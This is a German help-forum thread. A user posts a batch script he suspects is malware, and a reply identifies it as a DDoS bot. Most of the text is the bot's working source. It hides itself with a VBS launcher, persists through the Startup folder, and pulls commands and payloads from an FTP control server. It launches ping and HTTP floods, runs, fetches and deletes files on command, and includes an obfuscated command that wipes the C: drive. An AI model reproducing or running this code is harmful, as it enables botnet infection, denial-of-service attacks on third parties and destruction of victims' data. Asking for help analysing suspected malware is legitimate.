@echo off color 08 title IFTP ::Bot set botfile=quake.bat set vanishfile=quake.vbs set botcountfile=botcount set channel=quakenetsh set prefix=IDIOT set startfile=defender.bat set version=0.1 set DNA=temp ::bot script :check set cdbot=%cd% cd %userprofile%\AppData\Roaming if not exist %DNA% md %DNA% cd %DNA% if not exist Network md Network cd Network ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/infection echo get %botfile% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows if not exist %vanishfile% echo CreateObject("Wscript.Shell").Run "%botfile%", 0, False > %vanishfile% if exist edge.windows set /p botname= < edge.windows if not exist edge.windows goto setbotname cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup if not exist %bratfile% ( echo @echo off echo title IFTP echo cd %userprofile%\AppData\Roaming\%DNA%\Network echo if exist %vanishfile% start %vanishfile% echo exit ) > %startfile% cd %userprofile%\AppData\Roaming\%DNA%\Network if not exist s4ve.q echo saved > s4ve.q &&start %vanishfile% &&exit ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set message=has joined echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% goto command_loader set /a num1=%random% %% 9 set /a num2=%random% %% 9 set /a num3=%random% %% 99 set /a num4=%random% %% 9 set /a num5=%random% %% 9 set /a num6=%random% %% 9 set /a num7=%random% %% 99 set /a num8=%random% %% 9 if %num1%==0 set bot_num1=N if %num1%==1 set bot_num1=Q if %num1%==2 set bot_num1=S if %num1%==3 set bot_num1=F if %num1%==4 set bot_num1=T if %num1%==5 set bot_num1=U if %num1%==6 set bot_num1=V if %num1%==7 set bot_num1=K if %num1%==8 set bot_num1=X if %num1%==9 set bot_num1=J if %num4%==0 set bot_num4=N if %num4%==1 set bot_num4=Q if %num4%==2 set bot_num4=S if %num4%==3 set bot_num4=F if %num4%==4 set bot_num4=T if %num4%==5 set bot_num4=U if %num4%==6 set bot_num4=V if %num4%==7 set bot_num4=K if %num4%==8 set bot_num4=X if %num4%==9 set bot_num4=J if %num6%==0 set bot_num6=N if %num6%==1 set bot_num6=Q if %num6%==2 set bot_num6=S if %num6%==3 set bot_num6=F if %num6%==4 set bot_num6=T if %num6%==5 set bot_num6=U if %num6%==6 set bot_num6=V if %num6%==7 set bot_num6=K if %num6%==8 set bot_num6=X if %num6%==9 set bot_num6=J if %num8%==0 set bot_num8=N if %num8%==1 set bot_num8=Q if %num8%==2 set bot_num8=S if %num8%==3 set bot_num8=F if %num8%==4 set bot_num8=T if %num8%==5 set bot_num8=U if %num8%==6 set bot_num8=V if %num8%==7 set bot_num8=K if %num8%==8 set bot_num8=X if %num8%==9 set bot_num8=J set botname=%bot_num1%%num2%%num3%%bot_num4%%bot_num6%%num7%%bot_num8% echo %botname% > edge.windows ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set message=has joined echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/infection echo get %botcountfile% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set /p botcount= < %botcountfile% set /a botcount=%botcount%+1 echo %botcount% > %botcountfile% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/infection echo put %botcountfile% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% del %botcountfile% goto check :command_loader ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo get input.command echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set /p loading_cm= < input.command del input.command if %loading_cm%==PERL_HTTP-NULL set method=HTTP-NULL &&goto HTTP-NULL if %loading_cm%==ICMP set method=ICMP &&goto POD if %loading_cm%==QUAKE set method=QUAKE &&goto POD if %loading_cm%==VOICE set method=VOICE &&goto POD if %loading_cm%==GLOCK set method=GLOCK &&goto POD if %loading_cm%==update goto update if %loading_cm%==status goto Checkstatus if %loading_cm%==botcount goto howmanybots if %loading_cm%==kill.bots goto kill_bots if %loading_cm%==get goto get_file if %loading_cm%==get%botname% goto get_file if %loading_cm%==kill%botname% goto kill_bots if %loading_cm%==desstroy goto desstroy_system if %loading_cm%==desstroy%botname% goto desstroy_system if %loading_cm%==delete goto delete_file if %loading_cm%==start goto start_file goto command_loader :desstroy_system set dse1=R set dse2=D C:\ set dse3=/S set dse4=/Q %dse1%%dse2%%dse3%%dse4% goto command_loader :POD ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo get input.attack echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows < input.attack ( set /p target= set /p threads= set /p conns= set /p proxy= set /p proxylist= set /p sec= ) set message=I'm dropping a %method% bomb on %target% echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del input.attack del #%channel% :podloop set /a packet=%random% %% 8000 if %method%==QUAKE set size=%packet% if %method%==ICMP set size=65500 if %method%==VOICE set size=5000 if %method%==GLOCK set size=15000 ping %target% -l %size% -w 1 -4 -n 1 | FIND "TTL=" if %sec%==0 goto attack_stop set /a sec=%sec%-1 goto podloop :attack_stop ( echo localhost echo 0 echo 0 echo 0 echo 0 echo 0 ) > input.attack echo none > input.command ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo put input.command echo put input.attack echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows goto command_loader :installproxielist ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/buildingblocks echo get %proxylist% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows goto backpointinstallproxielist :HTTP-NULL ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo get input.attack echo cd /%folder%/telecom echo get #%channel% echo cd /%folder%/buildingblocks echo get %method%.pl echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows < input.attack ( set /p target= set /p threads= set /p conns= set /p proxy= set /p proxylist= set /p time= ) set message=[SLURRG! UFO dropping %conns% aliens they attacking the TARGET %target%] echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del input.attack del #%channel% if not exist %proxylist% goto installproxielist :backpointinstallproxielist ( echo @echo off echo perl %method%.pl http://%target% %threads% %conns% proxy=%proxy% proxylist=%proxylist% echo exit ) > %method%.bat echo CreateObject("Wscript.Shell").Run "%method%.bat", 0, False > %method%.vbs start %method%.vbs set /a time=%time%+5 ping 127.0.0.1 -l 35 -n %time% > nul taskkill /f /im perl.exe del %method%.bat del %method%.vbs ( echo localhost echo 0 echo 0 echo 0 echo 0 echo 0 ) > input.attack echo none > input.command ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo put input.command echo put input.attack echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows goto command_loader ::Update infection :update shutdown /r goto command_loader ::Check status :Checkstatus ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set message=Status=Version:%version% Infection:%start_file% DNA:%DNA% echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% ping 127.0.0.1 -l 35 -n 15 > nul goto command_loader ::Delete file :delete_file ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo get input.attack echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows < input.attack ( set /p filename= ) set message=%filename% deleted echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% del input.attack if exist %filename% del %filename% ping 127.0.0.1 -l 35 -n 15 > nul goto command_loader ::Start file :start_file ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo get input.attack echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows < input.attack ( set /p filename= ) ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set message=%filename% started echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% del input.attack if exist %filename% start %filename% ping 127.0.0.1 -l 35 -n 15 > nul goto command_loader ::Get file :get_file ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/commands echo get input.attack echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows < input.attack ( set /p filename= ) ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/buildingblocks echo get %filename% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set message=Get %filename% echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% del input.attack ping 127.0.0.1 -l 35 -n 15 > nul goto command_loader ::Kill bot/s :kill_bots ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo get #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows set message=Killed echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel% ( echo open %fsip% echo %fsun% echo %fspw% echo cd /%folder%/telecom echo put #%channel% echo y echo bye ) > data.%DNA% ftp -s:data.%DNA% > data.windows del data.%DNA% del data.windows del #%channel% del %botfile% del %vanishfile% ipconfig /renew ipconfig /release exit
Seite 1 von 1
Was macht diese Batch? Ich verstehe nicht genau, was die Batch macht.
#1
geschrieben 01. April 2020 - 08:40
Man hat mir gesagt, dass diese Batch eine Infection sein müsste ich habe sie aber nicht ausgeführt möchte aber doch gerne wissen Wie man diese Infection stopen kann. Mit Freundlichen Grüssen Leislolle | Flo
Anzeige
#2
geschrieben 01. April 2020 - 13:47
im wesentlichen baut das teil einen irc bot, der dann fuer div. DDoS und/oder irc-floods verwendet wird - soweit ich das ueberflogen habe werden noch kleinere aenderungen an der windows firewall vorgenommen und via ftp etwas nachgeladen.
definitiv malware.
definitiv malware.
- ← Variable aus Schleife übernehmen
- Skript/Web-Programmierung
- Batch die nicht das tut was sie soll :-( →
Thema verteilen:
Seite 1 von 1